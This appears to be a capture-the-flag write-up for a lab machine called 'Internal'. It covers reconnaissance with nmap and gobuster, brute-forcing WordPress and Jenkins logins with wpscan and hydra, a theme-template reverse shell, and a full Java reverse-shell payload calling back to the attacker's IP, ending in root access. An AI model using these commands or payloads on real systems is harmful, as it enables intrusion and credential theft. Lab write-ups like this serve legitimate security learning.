Table of Contents

LinkLevelCreator
HereHardTheMayor

Reconn

We won’t start by doing anything new, just an nmap to the machine.

╰─ lanfran@parrot ❯ map 10.10.170.6                                                                                                ─╯
[sudo] password for lanfran: 
Starting Nmap 7.91 ( https://nmap.org ) at 2021-07-09 10:53 CEST
Nmap scan report for 10.10.170.6
Host is up (0.082s latency).
Not shown: 990 closed ports
PORT     STATE    SERVICE      VERSION
22/tcp   open     ssh          OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 6e:fa:ef:be:f6:5f:98:b9:59:7b:f7:8e:b9:c5:62:1e (RSA)
|   256 ed:64:ed:33:e5:c9:30:58:ba:23:04:0d:14:eb:30:e9 (ECDSA)
|_  256 b0:7f:7f:7b:52:62:62:2a:60:d4:3d:36:fa:89:ee:ff (ED25519)
80/tcp   open     http         Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Apache2 Ubuntu Default Page: It works
1002/tcp filtered windows-icfw
1132/tcp filtered kvm-via-ip
1935/tcp filtered rtmp
2007/tcp filtered dectalk
2048/tcp filtered dls-monitor
2366/tcp filtered qip-login
6006/tcp filtered X11:6
8800/tcp filtered sunwebadmin
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.25 seconds

Let’s see if we can find a hidden folder or endpoint with gobuster.

╰─ lanfran@parrot ❯ scan 10.10.170.6                                                                                               ─╯
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url:            http://10.10.170.6
[+] Threads:        50
[+] Wordlist:       /usr/share/wordlists/dirb/common.txt
[+] Status codes:   200,204,301,302,307,401,403
[+] User Agent:     gobuster/3.0.1
[+] Timeout:        10s
===============================================================
2021/07/09 10:53:31 Starting gobuster
===============================================================
/.htaccess (Status: 403)
/blog (Status: 301)
/.hta (Status: 403)
/.htpasswd (Status: 403)
/index.html (Status: 200)
/javascript (Status: 301)
/phpmyadmin (Status: 301)
/server-status (Status: 403)
/wordpress (Status: 301)
===============================================================
2021/07/09 10:53:40 Finished
===============================================================

Well, we found two interesting endpoints, /blog and /wordpress.

Navigating towards them, we find in the source code, what would be an HTML label that refers to the virtual domain of the machine.

href =" http: //internal.thm/blog/index.php/feed/ "/>

So let’s add the new domain to /etc/hosts

Since /blog has a wordpress behind it, let’s run WPScan to get more information.

╰─ lanfran@parrot ❯ wpscan -e vp,vt,cb,u --url http://internal.thm/blog/                                                           ─╯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
[...]

[i] User(s) Identified:

[+] admin
 | Found By: Author Posts - Author Pattern (Passive Detection)
 | Confirmed By:
 |  Rss Generator (Passive Detection)
 |  Wp Json Api (Aggressive Detection)
 |   - http://internal.thm/blog/index.php/wp-json/wp/v2/users/?per_page=100&page=1
 |  Author Id Brute Forcing - Author Pattern (Aggressive Detection)
 |  Login Error Messages (Aggressive Detection)

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jul  9 10:58:59 2021
[+] Requests Done: 538
[+] Cached Requests: 9
[+] Data Sent: 142.935 KB
[+] Data Received: 538.97 KB
[+] Memory used: 219.34 MB
[+] Elapsed time: 00:00:18

Returns interesting information, found an user: admin.

Let’s see if we can brute force the WordPress login with that user…

╰─ lanfran@parrot ❯ wpscan --url http://internal.thm/blog -U admin -P /usr/share/wordlists/rockyou.txt                             ─╯
_______________________________________________________________
         __          _______   _____
         \ \        / /  __ \ / ____|
          \ \  /\  / /| |__) | (___   ___  __ _ _ __ ®
           \ \/  \/ / |  ___/ \___ \ / __|/ _` | '_ \
            \  /\  /  | |     ____) | (__| (_| | | | |
             \/  \/   |_|    |_____/ \___|\__,_|_| |_|

         WordPress Security Scanner by the WPScan Team
                         Version 3.8.17
       Sponsored by Automattic - https://automattic.com/
       @_WPScan_, @ethicalhack3r, @erwan_lr, @firefart
_______________________________________________________________
[...]

[+] Performing password attack on Xmlrpc against 1 user/s
[SUCCESS] - admin / [REDACTED]                                                                                                           
Trying admin / bratz1 Time: 00:02:40 <                                                       > (3885 / 14348277)  0.02%  ETA: ??:??:??

[!] Valid Combinations Found:
 | Username: admin, Password: [REDACTED]

[!] No WPScan API Token given, as a result vulnerability data has not been output.
[!] You can get a free API token with 25 daily requests by registering at https://wpscan.com/register

[+] Finished: Fri Jul  9 11:07:29 2021
[+] Requests Done: 4026
[+] Cached Requests: 37
[+] Data Sent: 2.036 MB
[+] Data Received: 2.31 MB
[+] Memory used: 237.906 MB
[+] Elapsed time: 00:02:51

Cool!

Now we have access to the admin panel of wordpress!

Foothold - User

Logging into WP-Admin, we can get a reverse shell using the 404.php template from the twentyseventeen theme.

And then we navigate to http://internal.thm/blog/wp-content/themes/twentyseventeen/404.php to get the connection!

╰─ lanfran@parrot ❯ nc -nlvp 1337                                                                                                                                  ─╯
listening on [any] 1337 ...
connect to [10.9.1.222] from (UNKNOWN) [10.10.170.6] 48948
bash: cannot set terminal process group (1075): Inappropriate ioctl for device
bash: no job control in this shell
www-data@internal:/var/www/html/wordpress/wp-content/themes/twentyseventeen$ id
uid=33(www-data) gid=33(www-data) groups=33(www-data)
www-data@internal:/var/www/html/wordpress/wp-content/themes/twentyseventeen$ whoami
www-data

We made a breakthrough, we already have one foot in the machine.

Looking through the files on the machine, we found a file containing the username and password of aubreanna!

www-data@internal:/opt$ ls -la
total 16
drwxr-xr-x  3 root root 4096 Aug  3  2020 .
drwxr-xr-x 24 root root 4096 Aug  3  2020 ..
drwx--x--x  4 root root 4096 Aug  3  2020 containerd
-rw-r--r--  1 root root  138 Aug  3  2020 wp-save.txt
www-data@internal:/opt$ cat wp-save.txt
Bill,

Aubreanna needed these credentials for something later.  Let her know you have them and where they are.

aubreanna:[REDACTED]
www-data@internal:/opt$ su aubreanna
Password: [REDACTED]

aubreanna@internal:/opt$ cat /home/aubreanna/user.txt 
[REDACTED]

We can log in with su and read the user flag.

Root

In the home directory of aubreanna there is a note, let’s read it

aubreanna@internal:~$ cat jenkins.txt 
Internal Jenkins service is running on 172.17.0.2:8080
aubreanna@internal:~$

Hmm, there’s a Jenkins service running …

Since we have the credentials of this user, let’s forward that port to us for being able to access it from our PC.

╰─ lanfran@parrot ❯ ssh -L 8080:172.17.0.2:8080 aubreanna@internal.thm                                                             ─╯
The authenticity of host 'internal.thm (10.10.170.6)' can't be established.
ECDSA key fingerprint is SHA256:fJ/BlTrDF8wS8/eqyoej1aq/NmvQh79ABdkpiiN5tqE.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added 'internal.thm,10.10.170.6' (ECDSA) to the list of known hosts.
aubreanna@internal.thm's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jul  9 09:24:06 UTC 2021

  System load:  0.02              Processes:              117
  Usage of /:   63.9% of 8.79GB   Users logged in:        0
  Memory usage: 48%               IP address for eth0:    10.10.170.6
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.


Last login: Mon Aug  3 19:56:19 2020 from 10.6.2.56
aubreanna@internal:~$

Hmm, if we now go to 127.0.0.1:8080 we will see the jenkins page requesting credentials, let’s use hydra to brute force it.

╰─ lanfran@parrot ❯ hydra 127.0.0.1 -s 8080 -f http-form-post "/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password" -l admin -P /usr/share/wordlists/rockyou.txt 
Hydra v9.1 (c) 2020 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2021-07-09 11:41:41
[WARNING] Restorefile (you have 10 seconds to abort... (use option -I to skip waiting)) from a previous session found, to prevent overwriting, ./hydra.restore
[DATA] max 16 tasks per 1 server, overall 16 tasks, 14344399 login tries (l:1/p:14344399), ~896525 tries per task
[DATA] attacking http-post-form://127.0.0.1:8080/j_acegi_security_check:j_username=^USER^&j_password=^PASS^&from=%2F&Submit=Sign+in&Login=Login:Invalid username or password
[8080][http-post-form] host: 127.0.0.1   login: admin   password: [REDACTED]
[STATUS] attack finished for 127.0.0.1 (valid pair found)
1 of 1 target successfully completed, 1 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2021-07-09 11:42:07

Yes!! We get the username and password to be able to log in.

At the address http://127.0.0.1:8080/script we can execute a script!

I will use a reverse shell of the repository PayloadsAllTheThings:

String host="10.9.1.222";
int port=1337;
String cmd="/bin/bash";
Process p=new ProcessBuilder(cmd).redirectErrorStream(true).start();Socket s=new Socket(host,port);InputStream pi=p.getInputStream(),pe=p.getErrorStream(), si=s.getInputStream();OutputStream po=p.getOutputStream(),so=s.getOutputStream();while(!s.isClosed()){while(pi.available()>0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());while(si.available()>0)po.write(si.read());so.flush();po.flush();Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};p.destroy();s.close();
╰─ lanfran@parrot ❯ nc -nlvp 1337                                                                                                                                  ─╯
listening on [any] 1337 ...
connect to [10.9.1.222] from (UNKNOWN) [10.10.170.6] 53972
id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)
whoami
jenkins
cd /opt
ls -la
total 12
drwxr-xr-x 1 root root 4096 Aug  3  2020 .
drwxr-xr-x 1 root root 4096 Aug  3  2020 ..
-rw-r--r-- 1 root root  204 Aug  3  2020 note.txt
cat note.txt
Aubreanna,

Will wanted these credentials secured behind the Jenkins container since we have several layers of defense here.  Use them if you 
need access to the root user account.

root:[REDACTED]

YES! Reverse shell like jenkins!

Looking through the directories again, I found the password for root!!

╰─ lanfran@parrot ❯ ssh -L 8080:172.17.0.2:8080 root@internal.thm                                                                                                  ─╯
root@internal.thm's password: 
Welcome to Ubuntu 18.04.4 LTS (GNU/Linux 4.15.0-112-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Fri Jul  9 09:52:03 UTC 2021

  System load:  0.0               Processes:              111
  Usage of /:   63.9% of 8.79GB   Users logged in:        0
  Memory usage: 57%               IP address for eth0:    10.10.170.6
  Swap usage:   0%                IP address for docker0: 172.17.0.1

  => There is 1 zombie process.


 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

0 packages can be updated.
0 updates are security updates.

Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings


Last login: Mon Aug  3 19:59:17 2020 from 10.6.2.56
root@internal:~# cat root.txt 
[REDACTED]

And we rooted the machine!

That’s all from my side, hope you find this helpful!